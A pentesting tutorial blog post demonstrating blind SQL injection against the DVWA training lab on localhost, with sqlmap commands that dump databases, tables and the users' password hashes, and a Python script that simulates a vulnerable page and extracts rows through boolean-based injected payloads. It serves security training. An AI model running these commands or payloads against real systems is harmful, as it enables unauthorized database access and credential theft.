Tips for an Information Security Analyst/Pentester career - Episode 12 (reviewed version): Blind SQL injection with DVWA

Last reviewed: 8/27/2017

Intro

We talked about SQL injection in the previous episode.

There I typed injection payloads into the input fields by hand and read the query results straight off the page.

However, that isn't the only approach, and it isn't always possible.

In a blind SQL injection the application never shows us the query's output or its error messages: all we get back is a difference in behaviour, for example "User ID exists in the database" versus "User ID is MISSING". We can still inject, but every fact about the database has to be inferred one true/false question at a time, which is far too tedious to do by hand.

In this case, we'll have a tool (sqlmap) run the injection for us, instead of having to do it manually.


Prep

In DVWA, I open the SQL Injection (Blind) page, enter a valid user id (3) and click Submit.


We need the URL of the resulting page, including the id and Submit parameters.


At that point, I grab the session cookie by right-clicking on an empty point in the page and choosing Page Info, then Security, then View Cookies (Firefox). We need both the PHPSESSID value and the security cookie: DVWA only serves the page to a logged-in session, and security=low selects the unprotected version of the page.


Sqlmap execution

We launch the following sqlmap command (the cookie header carries the two values copied from the browser):

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dump-all

--dump-all dumps every table of every database the web application's account can read.

When the dumped data contains recognisable password hashes, sqlmap offers to run a dictionary attack against them.

It then writes everything it retrieved to CSV files under its output directory.

sqlmap reports the technique it settled on ("boolean-based blind" for this page). Raising the verbosity with -v 3 also prints every injected payload, which confirms that the attack really is blind.


Afterward, we want to know the names of the databases and we use the following command:

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dbs

The command returns 7 available databases.

Now that we know the name of the database (dvwa), we can list its tables:

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa --tables

The command returns two tables. The users table is the one we want to know more about.

Now, we want to have a look at the columns in the users table, and we run the following command (the option is --columns, and we pass -D dvwa so sqlmap doesn't have to guess which database the table lives in):

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa -T users --columns

The command returns two interesting columns (user and password).


At this point, we want to extract the contents of these two columns, and we run a new command for this purpose (-D and -T are kept so sqlmap knows exactly which table to dump):

sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa -T users -C user,password --dump
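As an added example, not part of the original post or of sqlmap itself, the Python script below shows what the boolean-based blind injection behind that --dump actually does, and why the intro calls it too tedious to do by hand. It emulates DVWA's sqli_blind page (low security) with an in-memory SQLite table of constructed sample rows, a page that only answers "exists" or "missing", and then recovers the user and password columns one true/false question at a time, using a binary search over the character codes. The names BlindTarget, binary_search, extract_string and dump_users are mine. SQLite spellings (UNICODE, SUBSTR) are used; against DVWA's MySQL backend the equivalents are ASCII() and SUBSTRING().

```python
import sqlite3

# Constructed sample rows standing in for DVWA's `users` table
# (plain MD5 hashes, as DVWA stores them).
SAMPLE_ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]


class BlindTarget:
    """Stand-in for DVWA's sqli_blind page at security level 'low'.

    The page concatenates the `id` parameter straight into the query and
    answers only 'User ID exists' / 'User ID is MISSING'. It never shows the
    selected row or a database error, which is what makes the injection blind.
    """

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        self.con.execute("CREATE TABLE users(user_id INTEGER, user TEXT, password TEXT)")
        self.con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
        self.requests = 0  # how many 'page loads' the attack costs

    def page(self, user_id):
        """Return True for 'User ID exists', False for 'MISSING'."""
        self.requests += 1
        # Deliberately vulnerable: string concatenation, no parameterisation.
        query = f"SELECT user, password FROM users WHERE user_id = '{user_id}'"
        try:
            return self.con.execute(query).fetchone() is not None
        except sqlite3.Error:
            return False  # errors are swallowed, so a broken query looks like 'MISSING'


def binary_search(target, expr, lo, hi):
    """Recover the integer value of SQL expression `expr`, known to lie in
    [lo, hi], by asking only 'is it greater than mid?' questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        # Close the quote after the valid id 3, add our condition, then
        # re-balance the trailing quote the application appends:
        #   ... WHERE user_id = '3' AND (<expr>) > <mid> AND '1'='1'
        payload = f"3' AND ({expr}) > {mid} AND '1'='1"
        if target.page(payload):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(target, subquery, max_len=64):
    """Dump one string-valued subquery result, character by character.
    SQLite functions are used here; MySQL would need LENGTH/SUBSTRING/ASCII."""
    length = binary_search(target, f"LENGTH(({subquery}))", 0, max_len)
    return "".join(
        chr(binary_search(target, f"UNICODE(SUBSTR(({subquery}), {pos}, 1))", 0, 127))
        for pos in range(1, length + 1)
    )


def dump_users(target):
    """Blind equivalent of `sqlmap -D dvwa -T users -C user,password --dump`."""
    count = binary_search(target, "SELECT COUNT(*) FROM users", 0, 1024)
    rows = []
    for i in range(count):
        row_sel = f"FROM users ORDER BY user_id LIMIT 1 OFFSET {i}"
        user = extract_string(target, f"SELECT user {row_sel}")
        pwd = extract_string(target, f"SELECT password {row_sel}")
        rows.append((user, pwd))
    return rows


if __name__ == "__main__":
    t = BlindTarget()
    for user, pwd in dump_users(t):
        print(f"{user}\t{pwd}")
    print(f"{t.requests} requests to recover {len(SAMPLE_ROWS)} rows")
```

The request counter is the point of the exercise: three rows with 32-character hashes cost several hundred page loads, because each character comes back as seven yes/no answers rather than being read off a UNION result. That is the slowness the wrap-up below refers to, and it is also why a tool rather than a human drives a blind attack.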


Results

Usernames and password hashes are stored under /root/.sqlmap/output/localhost/dump/dvwa/users.csv

By opening it in a spreadsheet (here Excel under OS X), we can view all usernames and passwords for that specific table.


Wrap-up

Blind SQL injection is the more insidious cousin of the traditional attack: it works even when the application shows us neither query results nor error messages, so a UNION-based injection has nothing to read.

The price is speed. Every character has to be inferred from a series of true/false responses, so a blind dump is much slower than reading a result set off the page.

With sqlmap it's a set-and-forget approach, and it's the one to reach for when the page reveals nothing but a yes/no difference in behaviour.

